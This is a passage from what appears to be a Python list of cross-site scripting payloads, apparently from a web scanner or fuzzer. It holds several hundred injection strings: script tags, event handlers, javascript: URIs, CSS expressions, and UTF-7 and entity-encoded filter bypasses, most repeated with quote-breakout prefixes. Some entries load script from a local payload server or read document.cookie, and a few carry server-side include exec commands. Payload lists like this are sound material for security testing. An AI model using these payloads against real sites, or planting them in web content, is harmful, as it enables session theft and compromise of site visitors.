CONTENT="0; URL=http://;URL=javascript:javascript:alert(1);">', '<IFRAME SRC="javascript:javascript:alert(1);"></IFRAME>', '"><IFRAME SRC="javascript:javascript:alert(1);"></IFRAME>', '\'><IFRAME SRC="javascript:javascript:alert(1);"></IFRAME>', '<TABLE BACKGROUND="javascript:javascript:alert(1)">', '"><TABLE BACKGROUND="javascript:javascript:alert(1)">', '\'><TABLE BACKGROUND="javascript:javascript:alert(1)">', '<TABLE><TD BACKGROUND="javascript:javascript:alert(1)">', '"><TABLE><TD BACKGROUND="javascript:javascript:alert(1)">', '\'><TABLE><TD BACKGROUND="javascript:javascript:alert(1)">', '<DIV STYLE="background-image: url(javascript:javascript:alert(1))">', '"><DIV STYLE="background-image: url(javascript:javascript:alert(1))">', '\'><DIV STYLE="background-image: url(javascript:javascript:alert(1))">', '<DIV STYLE="width:expression(javascript:alert(1));">', '"><DIV STYLE="width:expression(javascript:alert(1));">', '\'><DIV STYLE="width:expression(javascript:alert(1));">', '<IMG STYLE="X:expr/*X*/ession(javascript:alert(1))">', '"><IMG STYLE="X:expr/*X*/ession(javascript:alert(1))">', '\'><IMG STYLE="X:expr/*X*/ession(javascript:alert(1))">', '<X STYLE="X:expression(javascript:alert(1))">', '"><X STYLE="X:expression(javascript:alert(1))">', '\'><X STYLE="X:expression(javascript:alert(1))">', '<STYLE TYPE="text/javascript">javascript:alert(1);</STYLE>', '"><STYLE TYPE="text/javascript">javascript:alert(1);</STYLE>', '\'><STYLE TYPE="text/javascript">javascript:alert(1);</STYLE>', '<STYLE>.X{background-image:url("javascript:javascript:alert(1)");}</STYLE><A CLASS=X></A>', '"><STYLE>.X{background-image:url("javascript:javascript:alert(1)");}</STYLE><A CLASS=X></A>', '\'><STYLE>.X{background-image:url("javascript:javascript:alert(1)");}</STYLE><A CLASS=X></A>', '"><A CLASS=X></A>', "'><A CLASS=X></A>", '<STYLE type="text/css">BODY{background:url("javascript:javascript:alert(1)")}</STYLE>', '"><STYLE type="text/css">BODY{background:url("javascript:javascript:alert(1)")}</STYLE>', '\'><STYLE type="text/css">BODY{background:url("javascript:javascript:alert(1)")}</STYLE>', '<!--[if gte IE 4]><SCRIPT>javascript:alert(1);</SCRIPT><![endif]-->', '"><!--[if gte IE 4]><SCRIPT>javascript:alert(1);</SCRIPT><![endif]-->', "'><!--[if gte IE 4]><SCRIPT>javascript:alert(1);</SCRIPT><![endif]-->", '<BASE HREF="javascript:javascript:alert(1);//">', '"><BASE HREF="javascript:javascript:alert(1);//">', '\'><BASE HREF="javascript:javascript:alert(1);//">', '<OBJECT TYPE="text/x-scriptlet" DATA="%(scriptlet)s"></OBJECT>', '"><OBJECT TYPE="text/x-scriptlet" DATA="%(scriptlet)s"></OBJECT>', '\'><OBJECT TYPE="text/x-scriptlet" DATA="%(scriptlet)s"></OBJECT>', '<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:javascript:alert(1)></OBJECT>', '"><OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:javascript:alert(1)></OBJECT>', "'><OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:javascript:alert(1)></OBJECT>", '<HTML xmlns:X><?import namespace="X" implementation="%(htc)s"><X:X>X</X:X></HTML>""","XML namespace."),("""<XML ID="X"><I><B>&lt;IMG SRC="javas<!-- -->cript:javascript:alert(1)"&gt;</B></I></XML><SPAN DATASRC="#X" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>', '"><HTML xmlns:X><?import namespace="X" implementation="%(htc)s"><X:X>X</X:X></HTML>""","XML namespace."),("""<XML ID="X"><I><B>&lt;IMG SRC="javas<!-- -->cript:javascript:alert(1)"&gt;</B></I></XML><SPAN DATASRC="#X" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>', '\'><HTML xmlns:X><?import namespace="X" implementation="%(htc)s"><X:X>X</X:X></HTML>""","XML namespace."),("""<XML ID="X"><I><B>&lt;IMG SRC="javas<!-- -->cript:javascript:alert(1)"&gt;</B></I></XML><SPAN DATASRC="#X" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>', '"><SPAN DATASRC="#X" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>', '\'><SPAN DATASRC="#X" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>', '<HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">', '"><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">', '\'><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="X&lt;SCRIPT DEFER&gt;javascript:alert(1)&lt;/SCRIPT&gt;"></BODY></HTML>', '<SCRIPT SRC="%(jpg)s"></SCRIPT>', '"><SCRIPT SRC="%(jpg)s"></SCRIPT>', '\'><SCRIPT SRC="%(jpg)s"></SCRIPT>', '<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-%(payload)s;+ADw-/SCRIPT+AD4-', '"><HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-%(payload)s;+ADw-/SCRIPT+AD4-', '\'><HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-%(payload)s;+ADw-/SCRIPT+AD4-', '<form id="test" /><button form="test" formaction="javascript:javascript:alert(1)">X', '"><form id="test" /><button form="test" formaction="javascript:javascript:alert(1)">X', '\'><form id="test" /><button form="test" formaction="javascript:javascript:alert(1)">X', '<body onscroll=javascript:alert(1)><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><input autofocus>', '"><body onscroll=javascript:alert(1)><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><input autofocus>', "'><body onscroll=javascript:alert(1)><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><input autofocus>", '<P STYLE="behavior:url(\'#default#time2\')" end="0" onEnd="javascript:alert(1)">', '"><P STYLE="behavior:url(\'#default#time2\')" end="0" onEnd="javascript:alert(1)">', '\'><P STYLE="behavior:url(\'#default#time2\')" end="0" onEnd="javascript:alert(1)">', "<STYLE>a{background:url('s1' 's2)}@import javascript:javascript:alert(1);');}</STYLE>", '"><STYLE>a{background:url(\'s1\' \'s2)}@import javascript:javascript:alert(1);\');}</STYLE>', "'><STYLE>a{background:url('s1' 's2)}@import javascript:javascript:alert(1);');}</STYLE>", '<meta charset= "x-imap4-modified-utf7"&&>&&<script&&>javascript:alert(1)&&;&&<&&/script&&>', '"><meta charset= "x-imap4-modified-utf7"&&>&&<script&&>javascript:alert(1)&&;&&<&&/script&&>', '\'><meta charset= "x-imap4-modified-utf7"&&>&&<script&&>javascript:alert(1)&&;&&<&&/script&&>', '<SCRIPT onreadystatechange=javascript:javascript:alert(1);></SCRIPT>', '"><SCRIPT onreadystatechange=javascript:javascript:alert(1);></SCRIPT>', "'><SCRIPT onreadystatechange=javascript:javascript:alert(1);></SCRIPT>", '<style onreadystatechange=javascript:javascript:alert(1);></style>', '"><style onreadystatechange=javascript:javascript:alert(1);></style>', "'><style onreadystatechange=javascript:javascript:alert(1);></style>", '<?xml version="1.0"?><html:html xmlns:html=\'http://www.w3.org/1999/xhtml\'><html:script>javascript:alert(1);</html:script></html:html>', '"><?xml version="1.0"?><html:html xmlns:html=\'http://www.w3.org/1999/xhtml\'><html:script>javascript:alert(1);</html:script></html:html>', '\'><?xml version="1.0"?><html:html xmlns:html=\'http://www.w3.org/1999/xhtml\'><html:script>javascript:alert(1);</html:script></html:html>', '<embed code=%(scriptlet)s></embed>', '"><embed code=%(scriptlet)s></embed>', "'><embed code=%(scriptlet)s></embed>", '<embed code=javascript:javascript:alert(1);></embed>', '"><embed code=javascript:javascript:alert(1);></embed>', "'><embed code=javascript:javascript:alert(1);></embed>", '<embed src=%(jscript)s></embed>', '"><embed src=%(jscript)s></embed>', "'><embed src=%(jscript)s></embed>", '<frameset onload=javascript:javascript:alert(1)></frameset>', '"><frameset onload=javascript:javascript:alert(1)></frameset>', "'><frameset onload=javascript:javascript:alert(1)></frameset>", '<object onerror=javascript:javascript:alert(1)>', '"><object onerror=javascript:javascript:alert(1)>', "'><object onerror=javascript:javascript:alert(1)>", '<embed type="image" src=%(scriptlet)s></embed>', '"><embed type="image" src=%(scriptlet)s></embed>', '\'><embed type="image" src=%(scriptlet)s></embed>', '<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]<![CDATA[cript:javascript:alert(1);">]]</C><X></xml>', '"><XML ID=I><X><C><![CDATA[<IMG SRC="javas]]<![CDATA[cript:javascript:alert(1);">]]</C><X></xml>', '\'><XML ID=I><X><C><![CDATA[<IMG SRC="javas]]<![CDATA[cript:javascript:alert(1);">]]</C><X></xml>', '<IMG SRC=&{javascript:alert(1);};>', '"><IMG SRC=&{javascript:alert(1);};>', "'><IMG SRC=&{javascript:alert(1);};>", '<a href="jav&#65ascript:javascript:alert(1)">test1</a>', '"><a href="jav&#65ascript:javascript:alert(1)">test1</a>', '\'><a href="jav&#65ascript:javascript:alert(1)">test1</a>', '<a href="jav&#97ascript:javascript:alert(1)">test1</a>', '"><a href="jav&#97ascript:javascript:alert(1)">test1</a>', '\'><a href="jav&#97ascript:javascript:alert(1)">test1</a>', '<embed width=500 height=500 code="data:text/html,<script>%(payload)s</script>', '</ScrIpt><script>%(payload)s</script>', '"><script>%(payload)s</script>', '</ScrIpt><script>%(payload)s</script>', "'><script>%(payload)s</script>", '</ScrIpt><script>%(payload)s</script>"></embed>', '<iframe srcdoc="&LT;iframe&sol;srcdoc=&amp;lt;img&sol;src=&amp;apos;&amp;apos;onerror=javascript:alert(1)&amp;gt;>">', '"><iframe srcdoc="&LT;iframe&sol;srcdoc=&amp;lt;img&sol;src=&amp;apos;&amp;apos;onerror=javascript:alert(1)&amp;gt;>">', '\'><iframe srcdoc="&LT;iframe&sol;srcdoc=&amp;lt;img&sol;src=&amp;apos;&amp;apos;onerror=javascript:alert(1)&amp;gt;>">', 'alert(String.fromCharCode(75,67,70))//";alert(String.fromCharCode(75,67,70))//--', '></SCRIPT>">\'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>', '<SCRIPT SRC=http://127.0.0.1:3555/xss_serve_payloads/X.js></SCRIPT>', '"><SCRIPT SRC=http://127.0.0.1:3555/xss_serve_payloads/X.js></SCRIPT>', "'><SCRIPT SRC=http://127.0.0.1:3555/xss_serve_payloads/X.js></SCRIPT>", '<SCRIPT SRC=http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp></SCRIPT>', '"><SCRIPT SRC=http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp></SCRIPT>', "'><SCRIPT SRC=http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp></SCRIPT>", '<IMG SRC="javascript:alert(\'X\');">', '"><IMG SRC="javascript:alert(\'X\');">', '\'><IMG SRC="javascript:alert(\'X\');">', "<IMG SRC=javascript:alert('X')>", '"><IMG SRC=javascript:alert(\'X\')>', "'><IMG SRC=javascript:alert('X')>", "<IMG SRC=JaVaScRiPt:alert('X')>", '"><IMG SRC=JaVaScRiPt:alert(\'X\')>', "'><IMG SRC=JaVaScRiPt:alert('X')>", '<IMG SRC=javascript:alert("X")>', '"><IMG SRC=javascript:alert("X")>', '\'><IMG SRC=javascript:alert("X")>', '<IMG SRC=`javascript:alert("X says, \'X\'")`>', '"><IMG SRC=`javascript:alert("X says, \'X\'")`>', '\'><IMG SRC=`javascript:alert("X says, \'X\'")`>', '<a onmouseover="alert(document.cookie)">X link</a>', '"><a onmouseover="alert(document.cookie)">X link</a>', '\'><a onmouseover="alert(document.cookie)">X link</a>', '<a onmouseover=alert(document.cookie)>X link</a>', '"><a onmouseover=alert(document.cookie)>X link</a>', "'><a onmouseover=alert(document.cookie)>X link</a>", '<IMG """><SCRIPT>alert("X")</SCRIPT>">', '"><IMG """><SCRIPT>alert("X")</SCRIPT>">', '\'><IMG """><SCRIPT>alert("X")</SCRIPT>">', '<IMG SRC= onmouseover="alert(\'X\')">', '"><IMG SRC= onmouseover="alert(\'X\')">', '\'><IMG SRC= onmouseover="alert(\'X\')">', '<IMG onmouseover="alert(\'X\')">', '"><IMG onmouseover="alert(\'X\')">', '\'><IMG onmouseover="alert(\'X\')">', '<IMG SRC="jav&#x09;ascript:alert(\'X\');">', '"><IMG SRC="jav&#x09;ascript:alert(\'X\');">', '\'><IMG SRC="jav&#x09;ascript:alert(\'X\');">', '<IMG SRC="jav&#x0D;ascript:alert(\'X\');">', '"><IMG SRC="jav&#x0D;ascript:alert(\'X\');">', '\'><IMG SRC="jav&#x0D;ascript:alert(\'X\');">', 'perl -e \'print "<IMG SRC=java\\0script:alert(\\"X\\")>";\' > out', '<IMG SRC=" &#14; javascript:alert(\'X\');">', '"><IMG SRC=" &#14; javascript:alert(\'X\');">', '\'><IMG SRC=" &#14; javascript:alert(\'X\');">', '<SCRIPT/X SRC="http://127.0.0.1:3555/xss_serve_payloads/X.js"></SCRIPT>', '"><SCRIPT/X SRC="http://127.0.0.1:3555/xss_serve_payloads/X.js"></SCRIPT>', '\'><SCRIPT/X SRC="http://127.0.0.1:3555/xss_serve_payloads/X.js"></SCRIPT>', '<SCRIPT/X SRC="http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp"></SCRIPT>', '"><SCRIPT/X SRC="http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp"></SCRIPT>', '\'><SCRIPT/X SRC="http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp"></SCRIPT>', '<SCRIPT/SRC="http://127.0.0.1:3555/xss_serve_payloads/X.js"></SCRIPT>', '"><SCRIPT/SRC="http://127.0.0.1:3555/xss_serve_payloads/X.js"></SCRIPT>', '\'><SCRIPT/SRC="http://127.0.0.1:3555/xss_serve_payloads/X.js"></SCRIPT>', '<SCRIPT/SRC="http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp"></SCRIPT>', '"><SCRIPT/SRC="http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp"></SCRIPT>', '\'><SCRIPT/SRC="http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp"></SCRIPT>', '<<SCRIPT>alert("X");//<</SCRIPT>', '"><<SCRIPT>alert("X");//<</SCRIPT>', '\'><<SCRIPT>alert("X");//<</SCRIPT>', '<SCRIPT SRC=http://127.0.0.1:3555/xss_serve_payloads/X.js< B >', '"><SCRIPT SRC=http://127.0.0.1:3555/xss_serve_payloads/X.js< B >', "'><SCRIPT SRC=http://127.0.0.1:3555/xss_serve_payloads/X.js< B >", '<SCRIPT SRC=http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp< B >', '"><SCRIPT SRC=http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp< B >', "'><SCRIPT SRC=http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp< B >", '<SCRIPT SRC=//127.0.0.1:3555/xss_serve_payloads/.j>', '"><SCRIPT SRC=//127.0.0.1:3555/xss_serve_payloads/.j>', "'><SCRIPT SRC=//127.0.0.1:3555/xss_serve_payloads/.j>", '<IMG SRC="javascript:alert(\'X\')"', '"><IMG SRC="javascript:alert(\'X\')"', '\'><IMG SRC="javascript:alert(\'X\')"', '</TITLE><SCRIPT>alert("X");</SCRIPT>', '"></TITLE><SCRIPT>alert("X");</SCRIPT>', '\'></TITLE><SCRIPT>alert("X");</SCRIPT>', '<INPUT TYPE="IMAGE" SRC="javascript:alert(\'X\');">', '"><INPUT TYPE="IMAGE" SRC="javascript:alert(\'X\');">', '\'><INPUT TYPE="IMAGE" SRC="javascript:alert(\'X\');">', '<BODY BACKGROUND="javascript:alert(\'X\')">', '"><BODY BACKGROUND="javascript:alert(\'X\')">', '\'><BODY BACKGROUND="javascript:alert(\'X\')">', '<IMG DYNSRC="javascript:alert(\'X\')">', '"><IMG DYNSRC="javascript:alert(\'X\')">', '\'><IMG DYNSRC="javascript:alert(\'X\')">', '<IMG LOWSRC="javascript:alert(\'X\')">', '"><IMG LOWSRC="javascript:alert(\'X\')">', '\'><IMG LOWSRC="javascript:alert(\'X\')">', '<STYLE>li {list-style-image: url("javascript:alert(\'X\')");}</STYLE><UL><LI>X</br>', '"><STYLE>li {list-style-image: url("javascript:alert(\'X\')");}</STYLE><UL><LI>X</br>', '\'><STYLE>li {list-style-image: url("javascript:alert(\'X\')");}</STYLE><UL><LI>X</br>', '<IMG SRC=\'vbscript:msgbox("X")\'>', '"><IMG SRC=\'vbscript:msgbox("X")\'>', '\'><IMG SRC=\'vbscript:msgbox("X")\'>', '<IMG SRC="livescript:[code]">', '"><IMG SRC="livescript:[code]">', '\'><IMG SRC="livescript:[code]">', "<BODY ONLOAD=alert('X')>", '"><BODY ONLOAD=alert(\'X\')>', "'><BODY ONLOAD=alert('X')>", '<BGSOUND SRC="javascript:alert(\'X\');">', '"><BGSOUND SRC="javascript:alert(\'X\');">', '\'><BGSOUND SRC="javascript:alert(\'X\');">', '<BR SIZE="&{alert(\'X\')}">', '"><BR SIZE="&{alert(\'X\')}">', '\'><BR SIZE="&{alert(\'X\')}">', '<LINK REL="stylesheet" HREF="javascript:alert(\'X\');">', '"><LINK REL="stylesheet" HREF="javascript:alert(\'X\');">', '\'><LINK REL="stylesheet" HREF="javascript:alert(\'X\');">', '<STYLE>BODY{-moz-binding:url("http://127.0.0.1:3555/xss_serve_payloads/X.xml#X")}</STYLE>', '"><STYLE>BODY{-moz-binding:url("http://127.0.0.1:3555/xss_serve_payloads/X.xml#X")}</STYLE>', '\'><STYLE>BODY{-moz-binding:url("http://127.0.0.1:3555/xss_serve_payloads/X.xml#X")}</STYLE>', '<STYLE>@im\\port\'\\ja\\vasc\\ript:alert("X")\';</STYLE>', '"><STYLE>@im\\port\'\\ja\\vasc\\ript:alert("X")\';</STYLE>', '\'><STYLE>@im\\port\'\\ja\\vasc\\ript:alert("X")\';</STYLE>', '<IMG STYLE="X:expr/*X*/ession(alert(\'X\'))">', '"><IMG STYLE="X:expr/*X*/ession(alert(\'X\'))">', '\'><IMG STYLE="X:expr/*X*/ession(alert(\'X\'))">', '<STYLE TYPE="text/javascript">alert(\'X\');</STYLE>', '"><STYLE TYPE="text/javascript">alert(\'X\');</STYLE>', '\'><STYLE TYPE="text/javascript">alert(\'X\');</STYLE>', '<STYLE>.X{background-image:url("javascript:alert(\'X\')");}</STYLE><A CLASS=X></A>', '"><STYLE>.X{background-image:url("javascript:alert(\'X\')");}</STYLE><A CLASS=X></A>', '\'><STYLE>.X{background-image:url("javascript:alert(\'X\')");}</STYLE><A CLASS=X></A>', '"><A CLASS=X></A>', "'><A CLASS=X></A>", '<STYLE type="text/css">BODY{background:url("javascript:alert(\'X\')")}</STYLE>', '"><STYLE type="text/css">BODY{background:url("javascript:alert(\'X\')")}</STYLE>', '\'><STYLE type="text/css">BODY{background:url("javascript:alert(\'X\')")}</STYLE>', '<X STYLE="X:expression(alert(\'X\'))">', '"><X STYLE="X:expression(alert(\'X\'))">', '\'><X STYLE="X:expression(alert(\'X\'))">', '<X STYLE="behavior: url(X.htc);">', '"><X STYLE="behavior: url(X.htc);">', '\'><X STYLE="behavior: url(X.htc);">', '<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(\'X\');">', '"><META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(\'X\');">', '\'><META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(\'X\');">', '<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html base64,PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg==">', '"><META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html base64,PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg==">', '\'><META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html base64,PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg==">', '<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert(\'X\');">', '"><META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert(\'X\');">', '\'><META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert(\'X\');">', '<IFRAME SRC="javascript:alert(\'X\');"></IFRAME>', '"><IFRAME SRC="javascript:alert(\'X\');"></IFRAME>', '\'><IFRAME SRC="javascript:alert(\'X\');"></IFRAME>', '<IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>', '"><IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>', '\'><IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>', '<FRAMESET><FRAME SRC="javascript:alert(\'X\');"></FRAMESET>', '"><FRAMESET><FRAME SRC="javascript:alert(\'X\');"></FRAMESET>', '\'><FRAMESET><FRAME SRC="javascript:alert(\'X\');"></FRAMESET>', '<TABLE BACKGROUND="javascript:alert(\'X\')">', '"><TABLE BACKGROUND="javascript:alert(\'X\')">', '\'><TABLE BACKGROUND="javascript:alert(\'X\')">', '<TABLE><TD BACKGROUND="javascript:alert(\'X\')">', '"><TABLE><TD BACKGROUND="javascript:alert(\'X\')">', '\'><TABLE><TD BACKGROUND="javascript:alert(\'X\')">', '<DIV STYLE="background-image: url(javascript:alert(\'X\'))">', '"><DIV STYLE="background-image: url(javascript:alert(\'X\'))">', '\'><DIV STYLE="background-image: url(javascript:alert(\'X\'))">', '<DIV STYLE="background-image: url(&#1;javascript:alert(\'X\'))">', '"><DIV STYLE="background-image: url(&#1;javascript:alert(\'X\'))">', '\'><DIV STYLE="background-image: url(&#1;javascript:alert(\'X\'))">', '<DIV STYLE="width: expression(alert(\'X\'));">', '"><DIV STYLE="width: expression(alert(\'X\'));">', '\'><DIV STYLE="width: expression(alert(\'X\'));">', '<BASE HREF="javascript:alert(\'X\');//">', '"><BASE HREF="javascript:alert(\'X\');//">', '\'><BASE HREF="javascript:alert(\'X\');//">', '<object type="text/x-scriptlet" data="http://127.0.0.1:3555/xss_serve_payloads/X.js"></object>', '"><object type="text/x-scriptlet" data="http://127.0.0.1:3555/xss_serve_payloads/X.js"></object>', '\'><object type="text/x-scriptlet" data="http://127.0.0.1:3555/xss_serve_payloads/X.js"></object>', '<object type="text/x-scriptlet" data="http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp"></object>', '"><object type="text/x-scriptlet" data="http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp"></object>', '\'><object type="text/x-scriptlet" data="http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp"></object>', '<OBJECT TYPE="text/x-scriptlet" DATA="http://127.0.0.1:3555/xss_serve_payloads/X.html"></OBJECT>', '"><OBJECT TYPE="text/x-scriptlet" DATA="http://127.0.0.1:3555/xss_serve_payloads/X.html"></OBJECT>', '\'><OBJECT TYPE="text/x-scriptlet" DATA="http://127.0.0.1:3555/xss_serve_payloads/X.html"></OBJECT>', '<EMBED SRC="data:image/svg+xml;base64,PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>', '"><EMBED SRC="data:image/svg+xml;base64,PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>', '\'><EMBED SRC="data:image/svg+xml;base64,PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>', '<SCRIPT SRC="http://127.0.0.1:3555/xss_serve_payloads/X.jpg"></SCRIPT>', '"><SCRIPT SRC="http://127.0.0.1:3555/xss_serve_payloads/X.jpg"></SCRIPT>', '\'><SCRIPT SRC="http://127.0.0.1:3555/xss_serve_payloads/X.jpg"></SCRIPT>', '<!--#exec cmd="/bin/echo \'<SCR\'"--><!--#exec cmd="/bin/echo \'IPT SRC=http://127.0.0.1:3555/xss_serve_payloads/X.js></SCRIPT>\'"-->', '"><!--#exec cmd="/bin/echo \'<SCR\'"--><!--#exec cmd="/bin/echo \'IPT SRC=http://127.0.0.1:3555/xss_serve_payloads/X.js></SCRIPT>\'"-->', '\'><!--#exec cmd="/bin/echo \'<SCR\'"--><!--#exec cmd="/bin/echo \'IPT SRC=http://127.0.0.1:3555/xss_serve_payloads/X.js></SCRIPT>\'"-->', '<!--#exec cmd="/bin/echo \'<SCR\'"--><!--#exec cmd="/bin/echo \'IPT SRC=http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp></SCRIPT>\'"-->', '"><!--#exec cmd="/bin/echo \'<SCR\'"--><!--#exec cmd="/bin/echo \'IPT SRC=http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp></SCRIPT>\'"-->', '\'><!--#exec cmd="/bin/echo \'<SCR\'"--><!--#exec cmd="/bin/echo \'IPT SRC=http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp></SCRIPT>\'"-->', '<? echo(\'<SCR)\';echo(\'IPT>alert("X")</SCRIPT>\'); ?>', '"><? echo(\'<SCR)\';echo(\'IPT>alert("X")</SCRIPT>\'); ?>', '\'><? echo(\'<SCR)\';echo(\'IPT>alert("X")</SCRIPT>\'); ?>', 'Redirect 302 /axaaX.jpg http://127.0.0.1:3555/xss_serve_payloads/X.html', '<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert(\'X\')</SCRIPT>">', '"><META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert(\'X\')</SCRIPT>">', '\'><META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert(\'X\')</SCRIPT>">', '<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert(\'X\');+ADw-/SCRIPT+AD4-', '"><HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert(\'X\');+ADw-/SCRIPT+AD4-', '\'><HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert(\'X\');+ADw-/SCRIPT+AD4-', '<A HREF="http://127.0.0.1/">X</A>', '"><A HREF="http://127.0.0.1/">X</A>', '\'><A HREF="http://127.0.0.1/">X</A>', '<A HREF="http://0x42.0x0000066.0x7.0x93/">X</A>', '"><A HREF="http://0x42.0x0000066.0x7.0x93/">X</A>', '\'><A HREF="http://0x42.0x0000066.0x7.0x93/">X</A>', '<A HREF="http://0102.0146.0007.00000223/">X</A>', '"><A HREF="http://0102.0146.0007.00000223/">X</A>', '\'><A HREF="http://0102.0146.0007.00000223/">X</A>', '<A HREF="htt\tp://6\t6.000146.0x7.147/">X</A>', '"><A HREF="htt\tp://6\t6.000146.0x7.147/">X</A>', '\'><A HREF="htt\tp://6\t6.000146.0x7.147/">X</A>', '<iframe %00 src="&Tab;javascript:prompt(1)&Tab;"%00>', '"><iframe %00 src="&Tab;javascript:prompt(1)&Tab;"%00>', '\'><iframe %00 src="&Tab;javascript:prompt(1)&Tab;"%00>', "<svg><style>{font-family&colon;'<iframe/onload=confirm(1)>'", '"><svg><style>{font-family&colon;\'<iframe/onload=confirm(1)>\'', "'><svg><style>{font-family&colon;'<iframe/onload=confirm(1)>'", '<input/onmouseover="javaSCRIPT&colon;confirm&lpar;1&rpar;"', '"><input/onmouseover="javaSCRIPT&colon;confirm&lpar;1&rpar;"', '\'><input/onmouseover="javaSCRIPT&colon;confirm&lpar;1&rpar;"', '<sVg><scRipt %00>alert&lpar;1&rpar; {Opera}', '"><sVg><scRipt %00>alert&lpar;1&rpar; {Opera}', "'><sVg><scRipt %00>alert&lpar;1&rpar; {Opera}", '<img/src=`%00` onerror=this.onerror=confirm(1)', '"><img/src=`%00` onerror=this.onerror=confirm(1)', "'><img/src=`%00` onerror=this.onerror=confirm(1)", '<form><isindex formaction="javascript&colon;confirm(1)"', '"><form><isindex formaction="javascript&colon;confirm(1)"', '\'><form><isindex formaction="javascript&colon;confirm(1)"', '<img src=`%00`&NewLine; onerror=alert(1)&NewLine;', '"><img src=`%00`&NewLine; onerror=alert(1)&NewLine;', "'><img src=`%00`&NewLine; onerror=alert(1)&NewLine;", "<script/&Tab; src='http://127.0.0.1:3555/xss_serve_payloads/X.js' /&Tab;></script>", '"><script/&Tab; src=\'http://127.0.0.1:3555/xss_serve_payloads/X.js\' /&Tab;></script>', "'><script/&Tab; src='http://127.0.0.1:3555/xss_serve_payloads/X.js' /&Tab;></script>", "<script/&Tab; src='http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp' /&Tab;></script>", '"><script/&Tab; src=\'http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp\' /&Tab;></script>', "'><script/&Tab; src='http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp' /&Tab;></script>", '<ScRipT 5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=?', '"><ScRipT 5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=?', "'><ScRipT 5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=?", 